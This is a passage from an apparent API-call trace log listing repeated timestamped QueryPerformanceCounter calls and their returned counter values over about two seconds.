out: lpPerformanceCount=0x6adfdfc*=3095244457622) returned 1 [0133.626] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095244474380) returned 1 [0133.642] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095246061322) returned 1 [0133.642] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095246077938) returned 1 [0133.658] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095247676042) returned 1 [0133.658] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095247697732) returned 1 [0133.674] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095249258682) returned 1 [0133.674] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095249275448) returned 1 [0133.690] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095250860757) returned 1 [0133.690] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095250877404) returned 1 [0133.706] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095252460672) returned 1 [0133.706] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095252478142) returned 1 [0133.722] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095254079823) returned 1 [0133.722] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095254116455) returned 1 [0133.739] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095255821054) returned 1 [0133.739] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095255843673) returned 1 [0133.755] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095257407241) returned 1 [0133.755] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095257423977) returned 1 [0133.771] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095258991426) returned 1 [0133.771] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095259010612) returned 1 [0133.787] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095260587092) returned 1 [0133.787] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095260603571) returned 1 [0133.803] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095262189857) returned 1 [0133.803] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095262207357) returned 1 [0133.819] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095263786792) returned 1 [0133.819] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095263803898) returned 1 [0133.835] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095265392693) returned 1 [0133.835] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095265446292) returned 1 [0133.851] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095266990863) returned 1 [0133.851] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095267007834) returned 1 [0133.867] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095268571987) returned 1 [0133.867] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095268590162) returned 1 [0133.884] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095270340700) returned 1 [0133.885] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095270365097) returned 1 [0133.900] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095271863427) returned 1 [0133.900] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095271880412) returned 1 [0133.916] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095273462441) returned 1 [0133.916] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095273479853) returned 1 [0133.932] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095275075963) returned 1 [0133.932] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095275123771) returned 1 [0133.948] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095276663796) returned 1 [0133.948] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095276682337) returned 1 [0133.964] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095278352929) returned 1 [0133.965] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095278370218) returned 1 [0133.980] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095279914300) returned 1 [0133.980] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095279932774) returned 1 [0133.996] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095281494375) returned 1 [0133.996] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095281511011) returned 1 [0134.012] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095283063610) returned 1 [0134.012] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095283082302) returned 1 [0134.058] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095287717749) returned 1 [0134.058] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095287735567) returned 1 [0134.059] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095287809588) returned 1 [0134.059] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095287828145) returned 1 [0134.060] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095287860086) returned 1 [0134.060] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095287875674) returned 1 [0134.078] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095289668151) returned 1 [0134.078] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095289692347) returned 1 [0134.093] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095291157980) returned 1 [0134.093] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095291175040) returned 1 [0134.109] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095292760109) returned 1 [0134.109] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095292782034) returned 1 [0134.125] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095294404982) returned 1 [0134.125] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095294426844) returned 1 [0134.141] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095295989796) returned 1 [0134.141] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095296007142) returned 1 [0134.156] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095297555560) returned 1 [0134.157] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095297573110) returned 1 [0134.173] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095299161038) returned 1 [0134.173] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095299187646) returned 1 [0134.188] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095300752444) returned 1 [0134.189] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095300769740) returned 1 [0134.205] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095302355565) returned 1 [0134.205] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095302371465) returned 1 [0134.221] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095303956407) returned 1 [0134.221] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095303975506) returned 1 [0134.236] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095305551707) returned 1 [0134.237] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095305568093) returned 1 [0134.253] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095307157732) returned 1 [0134.253] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095307176719) returned 1 [0134.269] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095308776174) returned 1 [0134.269] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095308796907) returned 1 [0134.285] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095310397500) returned 1 [0134.285] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095310411274) returned 1 [0134.301] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095311965280) returned 1 [0134.301] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095314216930) returned 1 [0134.324] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095314313716) returned 1 [0134.324] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095314332259) returned 1 [0134.335] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095315419088) returned 1 [0134.335] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095315440503) returned 1 [0134.356] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095317515363) returned 1 [0134.356] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095317532937) returned 1 [0134.367] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095318605866) returned 1 [0134.367] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095318622216) returned 1 [0134.383] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095320248738) returned 1 [0134.384] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095320263415) returned 1 [0134.399] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095321792683) returned 1 [0134.399] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095321811142) returned 1 [0134.415] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095323395902) returned 1 [0134.415] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095323418256) returned 1 [0134.431] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095324979988) returned 1 [0134.431] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095324997153) returned 1 [0134.447] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095326591770) returned 1 [0134.447] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095326615142) returned 1 [0134.462] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095328141546) returned 1 [0134.463] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095328162135) returned 1 [0134.480] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095329877846) returned 1 [0134.480] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095329894288) returned 1 [0134.495] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095331429812) returned 1 [0134.495] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095331446307) returned 1 [0134.511] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095333042572) returned 1 [0134.512] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095333065771) returned 1 [0134.527] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095334580809) returned 1 [0134.527] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095334597780) returned 1 [0134.577] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095339629518) returned 1 [0134.577] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095339647457) returned 1 [0134.597] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095341583887) returned 1 [0134.597] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095341611198) returned 1 [0134.683] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095350171248) returned 1 [0134.683] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095350191900) returned 1 [0134.695] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095351400717) returned 1 [0134.695] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095351429852) returned 1 [0134.714] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095353276926) returned 1 [0134.714] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095353295526) returned 1 [0134.727] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095354633847) returned 1 [0134.728] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095354716807) returned 1 [0134.756] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095357506420) returned 1 [0134.756] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095357525368) returned 1 [0134.760] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095357918251) returned 1 [0134.760] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095357989563) returned 1 [0134.776] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095359464656) returned 1 [0134.776] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095359504588) returned 1 [0134.805] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095362422976) returned 1 [0134.805] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095362581652) returned 1 [0134.814] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095363273621) returned 1 [0134.814] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095363300248) returned 1 [0134.835] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095365370050) returned 1 [0134.835] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095365416012) returned 1 [0134.844] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095366298780) returned 1 [0134.844] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095366317388) returned 1 [0134.861] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095367991015) returned 1 [0134.861] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095368054578) returned 1 [0134.876] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095369491878) returned 1 [0134.876] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095369512891) returned 1 [0134.897] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095371640079) returned 1 [0134.898] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095371738639) returned 1 [0134.922] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095374147251) returned 1 [0134.923] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095374220610) returned 1 [0134.928] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095374677369) returned 1 [0134.928] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095374734420) returned 1 [0134.942] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095376154783) returned 1 [0134.943] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095376187899) returned 1 [0134.964] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095378259692) returned 1 [0134.964] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095378294652) returned 1 [0134.985] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095380448127) returned 1 [0134.986] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095380474398) returned 1 [0135.000] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095381895132) returned 1 [0135.000] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095381919300) returned 1 [0135.018] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095383689529) returned 1 [0135.018] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095383716121) returned 1 [0135.034] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095385290493) returned 1 [0135.034] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095385482635) returned 1 [0135.051] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095386967882) returned 1 [0135.051] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095386988102) returned 1 [0135.067] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095388628846) returned 1 [0135.067] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095388648257) returned 1 [0135.083] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095390240167) returned 1 [0135.084] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095390316969) returned 1 [0135.098] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095391741765) returned 1 [0135.099] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095391767464) returned 1 [0135.114] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095393514805) returned 1 [0135.117] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095393611802) returned 1 [0135.145] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095396398462) returned 1 [0135.145] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095396425712) returned 1 [0135.160] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095397883674) returned 1 [0135.160] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095397902047) returned 1 [0135.206] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095402509066) returned 1 [0135.206] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095402526517) returned 1 [0135.290] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095410927825) returned 1 [0135.291] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095410970024) returned 1 [0135.292] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095411065682) returned 1 [0135.292] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095411088333) returned 1 [0135.295] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095411445609) returned 1 [0135.296] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095411466302) returned 1 [0135.323] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095414223666) returned 1 [0135.323] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095414249189) returned 1 [0135.341] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095415964159) returned 1 [0135.341] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095416015901) returned 1 [0135.356] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095417611759) returned 1 [0135.358] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095417701727) returned 1 [0135.384] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095420301573) returned 1 [0135.384] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095420323490) returned 1 [0135.391] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095421016205) returned 1 [0135.391] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095421034105) returned 1 [0135.410] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095422867378) returned 1 [0135.410] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095422884925) returned 1 [0135.425] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095424388653) returned 1 [0135.425] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095424412118) returned 1 [0135.451] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095427009848) returned 1 [0135.451] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095427038224) returned 1 [0135.458] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095427699615) returned 1 [0135.458] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095427742919) returned 1 [0135.474] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095429263919) returned 1 [0135.474] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095429286371) returned 1 [0135.490] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095430856168) returned 1 [0135.490] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095430876899) returned 1 [0135.506] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095432463854) returned 1 [0135.506] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095432489619) returned 1 [0135.521] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: 